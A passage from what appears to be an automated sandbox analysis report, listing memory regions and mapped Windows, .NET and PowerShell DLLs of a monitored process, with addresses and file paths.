"private_0x0000000001be0000" filename = "" Region: id = 872 start_va = 0x6ee70000 end_va = 0x6ee78fff entry_point = 0x6ee70000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 873 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 874 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 875 start_va = 0x2b0000 end_va = 0x2b3fff entry_point = 0x2b0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 876 start_va = 0x11d0000 end_va = 0x11d3fff entry_point = 0x11d0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 877 start_va = 0x1290000 end_va = 0x12bffff entry_point = 0x1290000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 878 start_va = 0x1b50000 end_va = 0x1bb5fff entry_point = 0x1b50000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 879 start_va = 0x6fe10000 end_va = 0x6fe7ffff entry_point = 0x6fe10000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 880 start_va = 0x74f40000 end_va = 0x74f58fff entry_point = 0x74f40000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 881 start_va = 0x1da0000 end_va = 0x1ddffff entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 882 start_va = 0x6fe80000 end_va = 0x6fe8afff entry_point = 0x6fe80000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 883 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 884 start_va = 0x73460000 end_va = 0x73469fff entry_point = 0x73460000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 885 start_va = 0x74910000 end_va = 0x7494afff entry_point = 0x74910000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 886 start_va = 0x74b70000 end_va = 0x74b85fff entry_point = 0x74b70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 887 start_va = 0x63c60000 end_va = 0x63cd9fff entry_point = 0x63c60000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 888 start_va = 0x12c0000 end_va = 0x12c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012c0000" filename = "" Region: id = 889 start_va = 0x1c80000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 890 start_va = 0x63160000 end_va = 0x6370afff entry_point = 0x63160000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") Region: id = 891 start_va = 0x6e8e0000 end_va = 0x6e97afff entry_point = 0x6e8e0000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll") Region: id = 892 start_va = 0x12d0000 end_va = 0x12d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012d0000" filename = "" Region: id = 893 start_va = 0x12e0000 end_va = 0x12e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012e0000" filename = "" Region: id = 894 start_va = 0x12f0000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 895 start_va = 0x1300000 end_va = 0x130ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 896 start_va = 0x1350000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 897 start_va = 0x1360000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 898 start_va = 0x1bc0000 end_va = 0x1bcffff entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 899 start_va = 0x1bd0000 end_va = 0x1bdffff entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 900 start_va = 0x1cc0000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 901 start_va = 0x1d80000 end_va = 0x1d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 902 start_va = 0x1ee0000 end_va = 0x1f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 903 start_va = 0x1f20000 end_va = 0x3f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 904 start_va = 0x3fc0000 end_va = 0x3ffffff entry_point = 0x0 region_type = private name = "private_0x0000000003fc0000" filename = "" Region: id = 905 start_va = 0x61c30000 end_va = 0x62727fff entry_point = 0x61c30000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll") Region: id = 906 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 907 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 908 start_va = 0x1c20000 end_va = 0x1c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c20000" filename = "" Region: id = 909 start_va = 0x4000000 end_va = 0x42e1fff entry_point = 0x4000000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 910 start_va = 0x61490000 end_va = 0x61c2bfff entry_point = 0x61490000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll") Region: id = 911 start_va = 0x6d1e0000 end_va = 0x6d260fff entry_point = 0x6d1e0000 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4bdde288f147e3b3f2c090ecdf704e6d\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4bdde288f147e3b3f2c090ecdf704e6d\\microsoft.powershell.consolehost.ni.dll") Region: id = 912 start_va = 0x60920000 end_va = 0x61199fff entry_point = 0x60920000 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\a8e3a41ecbcc4bb1598ed5719f965110\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\a8e3a41ecbcc4bb1598ed5719f965110\\system.management.automation.ni.dll") Region: id = 913 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 914 start_va = 0x611a0000 end_va = 0x61481fff entry_point = 0x611a0000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 915 start_va = 0x611a0000 end_va = 0x61481fff entry_point = 0x611a0000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 916 start_va = 0x1c30000 end_va = 0x1c32fff entry_point = 0x1c30000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\System32\\l_intl.nls" (normalized: "c:\\windows\\system32\\l_intl.nls") Region: id = 917 start_va = 0x1de0000 end_va = 0x1e9ffff entry_point = 0x1de0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 918 start_va = 0x77110000 end_va = 0x77114fff entry_point = 0x77110000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 919 start_va = 0x1c40000 end_va = 0x1c40fff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 920 start_va = 0x1c50000 end_va = 0x1c54fff entry_point = 0x1c50000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 921 start_va = 0x3f20000 end_va = 0x3f60fff entry_point = 0x3f20000 region_type = mapped_file name = "sortkey.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 922 start_va = 0x611a0000 end_va = 0x61481fff entry_point = 0x611a0000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 923 start_va = 0x611a0000 end_va = 0x61481fff entry_point = 0x611a0000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 924 start_va = 0x1c60000 end_va = 0x1c67fff entry_point = 0x1c60000 region_type = mapped_file name = "microsoft.wsman.runtime.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll") Region: id = 925 start_va = 0x1c70000 end_va = 0x1c70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c70000" filename = "" Region: id = 926 start_va = 0x3f70000 end_va = 0x3fb2fff entry_point = 0x3f70000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 927 start_va = 0x638e0000 end_va = 0x6397bfff entry_point = 0x638e0000 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll") Region: id = 928 start_va = 0x63980000 end_va = 0x63a04fff entry_point = 0x63980000 region_type = mapped_file name = "microsoft.wsman.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\f1865caa683ceb3d12b383a94a35da14\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\f1865caa683ceb3d12b383a94a35da14\\microsoft.wsman.management.ni.dll") Region: id = 929 start_va = 0x67aa0000 end_va = 0x67ae2fff entry_point = 0x67aa0000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 930 start_va = 0x6cfa0000 end_va = 0x6d1d4fff entry_point = 0x6cfa0000 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll") Region: id = 931 start_va = 0x6f260000 end_va = 0x6f2aafff entry_point = 0x6f260000 region_type = mapped_file name = "microsoft.powershell.commands.diagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\e112e4460a0c9122de8c382126da4a2f\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\e112e4460a0c9122de8c382126da4a2f\\microsoft.powershell.commands.diagnostics.ni.dll") Region: id = 932 start_va = 0x72270000 end_va = 0x72294fff entry_point = 0x72270000 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll") Region: id = 933 start_va = 0x1d60000 end_va = 0x1d60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d60000" filename = "" Region: id = 934 start_va = 0x60340000 end_va = 0x60347fff entry_point = 0x60340000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll") Region: id = 935 start_va = 0x606b0000 end_va = 0x60772fff entry_point = 0x606b0000 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\583c7b9f52114c026088bdb9f19f64e8\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\583c7b9f52114c026088bdb9f19f64e8\\microsoft.powershell.commands.management.ni.dll") Region: id = 936 start_va = 0x60780000 end_va = 0x6091dfff entry_point = 0x60780000 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\82d7758f278f47dc4191abab1cb11ce3\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\82d7758f278f47dc4191abab1cb11ce3\\microsoft.powershell.commands.utility.ni.dll") Region: id = 937 start_va = 0x71f80000 end_va = 0x71facfff entry_point = 0x71f80000 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\6c5bef3ab74c06a641444eff648c0dde\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\6c5bef3ab74c06a641444eff648c0dde\\microsoft.powershell.security.ni.dll") Region: id = 938 start_va = 0x1d60000 end_va = 0x1d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 939 start_va = 0x42f0000 end_va = 0x4343fff entry_point = 0x42f0000 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll") Region: id = 940 start_va = 0x5ff40000 end_va = 0x60053fff entry_point = 0x5ff40000 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.DirectorySer#\\45ec12795950a7d54691591c615a9e3c\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.directoryser#\\45ec12795950a7d54691591c615a9e3c\\system.directoryservices.ni.dll") Region: id = 941 start_va = 0x60060000 end_va = 0x60163fff entry_point = 0x60060000 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\system.management.ni.dll") Region: id = 942 start_va = 0x60170000 end_va = 0x606a5fff entry_point = 0x60170000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\system.xml.ni.dll") Region: id = 943 start_va = 0x71b70000 end_va = 0x71b74fff entry_point = 0x71b70000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll") Region: id = 944 start_va = 0x1d70000 end_va = 0x1d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 945 start_va = 0x1d90000 end_va = 0x1d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 946 start_va = 0x1ea0000 end_va = 0x1eb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 947 start_va = 0x1ec0000 end_va = 0x1ecffff entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 948 start_va = 0x1ed0000 end_va = 0x1edffff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 949 start_va = 0x4350000 end_va = 0x435ffff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 950 start_va = 0x4360000 end_va = 0x436ffff entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 951 start_va = 0x4370000 end_va = 0x437ffff entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 952 start_va = 0x4380000 end_va = 0x438ffff entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 953 start_va = 0x74fb0000 end_va = 0x74fb7fff entry_point = 0x74fb0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 954 start_va = 0x74fd0000 end_va = 0x74feafff entry_point = 0x74fd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 955 start_va = 0x4390000 end_va = 0x440ffff entry_point = 0x0 region_type = private name = "private_0x0000000004390000" filename = "" Region: id = 956 start_va = 0x4410000 end_va = 0x441ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 957 start_va = 0x4420000 end_va = 0x46f1fff entry_point = 0x4420000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 958 start_va = 0x4700000 end_va = 0x4700fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004700000" filename = "" Region: id = 959 start_va = 0x5f8e0000 end_va = 0x5ff30fff entry_point = 0x5f8e0000 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Data\\1e85062785e286cd9eae9c26d2c61f73\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.data\\1e85062785e286cd9eae9c26d2c61f73\\system.data.ni.dll") Region: id = 960 start_va = 0x64e70000 end_va = 0x65141fff entry_point = 0x64e70000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 961 start_va = 0x75110000 end_va = 0x7511bfff entry_point = 0x75110000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 962 start_va = 0x75120000 end_va = 0x7523cfff entry_point = 0x75120000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 963 start_va = 0x77090000 end_va = 0x77095fff entry_point = 0x77090000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 964 start_va = 0x770d0000 end_va = 0x77104fff entry_point = 0x770d0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 965 start_va = 0x4710000 end_va = 0x471ffff entry_point = 0x0 region_type = private name = "private_0x0000000004710000" filename = "" Region: id = 966 start_va = 0x4720000 end_va = 0x4720fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004720000" filename = "" Region: id = 967 start_va = 0x6ba90000 end_va = 0x6baeafff entry_point = 0x6ba90000 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorjit.dll") Region: id = 968 start_va = 0x4730000 end_va = 0x473ffff entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 969 start_va = 0x4740000 end_va = 0x474ffff entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 970 start_va = 0x4750000 end_va = 0x475ffff entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 971 start_va = 0x4840000 end_va = 0x51cffff entry_point = 0x0 region_type = private name = "private_0x0000000004840000" filename = "" Region: id = 972 start_va = 0x5f7e0000 end_va = 0x5f8d0fff entry_point = 0x5f7e0000 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuration\\bc09ad2d49d8535371845cd7532f9271\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuration\\bc09ad2d49d8535371845cd7532f9271\\system.configuration.ni.dll") Region: id = 973 start_va = 0x7ff50000 end_va = 0x7ff5ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff50000" filename = "" Region: id = 974 start_va = 0x7ff60000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 975 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 976 start_va = 0x4760000 end_va = 0x476ffff entry_point = 0x0 region_type = private name = "private_0x0000000004760000" filename = "" Region: id = 977 start_va = 0x72910000 end_va = 0x72924fff entry_point = 0x72910000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 978 start_va = 0x72930000 end_va = 0x72981fff entry_point = 0x72930000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 979 start_va = 0x73820000 end_va = 0x7382cfff entry_point = 0x73820000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 980 start_va = 0x74b30000 end_va = 0x74b6bfff entry_point = 0x74b30000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 981 start_va = 0x4770000 end_va = 0x482ffff entry_point = 0x0 region_type = private name = "private_0x0000000004770000" filename = "" Region: id = 982 start_va = 0x74680000 end_va = 0x74684fff entry_point = 0x74680000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 983 start_va = 0x74b20000 end_va = 0x74b25fff entry_point = 0x74b20000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 984 start_va = 0x4770000 end_va = 0x478ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004770000" filename = "" Region: id = 985 start_va = 0x47f0000 end_va = 0x482ffff entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 986 start_va = 0x52e0000 end_va = 0x531ffff entry_point = 0x0 region_type = private name = "private_0x00000000052e0000" filename = "" Region: id = 987 start_va = 0x716a0000 end_va = 0x716eefff entry_point = 0x716a0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 988 start_va = 0x716f0000 end_va = 0x71747fff entry_point = 0x716f0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 989 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 990 start_va = 0x733c0000 end_va = 0x733dbfff entry_point = 0x733c0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 991 start_va = 0x733b0000 end_va = 0x733b6fff entry_point = 0x733b0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 992 start_va = 0x73270000 end_va = 